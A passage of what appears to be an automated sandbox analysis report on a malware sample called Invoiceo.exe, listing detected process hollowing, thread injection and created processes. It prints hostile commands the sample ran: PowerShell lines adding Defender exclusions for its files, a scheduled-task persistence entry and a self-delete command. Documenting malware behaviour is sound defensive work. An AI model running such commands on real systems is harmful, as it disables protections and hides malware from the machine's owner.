Source: C:\Users\user\Desktop\Invoiceo.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Invoiceo.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 330000

Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Users\user\Desktop\Invoiceo.exe C:\Users\user\Desktop\Invoiceo.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Invoiceo.exe'

Source: explorer.exe, 0000000D.00000000.221314636.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 0000000D.00000000.222460310.0000000001980000.00000002.00000001.sdmp, cmd.exe, 0000001A.00000002.484986181.0000000004680000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.275306032.000000000871F000.00000004.00000001.sdmp, cmd.exe, 0000001A.00000002.484986181.0000000004680000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.222460310.0000000001980000.00000002.00000001.sdmp, cmd.exe, 0000001A.00000002.484986181.0000000004680000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.222460310.0000000001980000.00000002.00000001.sdmp, cmd.exe, 0000001A.00000002.484986181.0000000004680000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	26_2_003396A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	26_2_00335AEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	26_2_00343F80

Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Users\user\Desktop\Invoiceo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
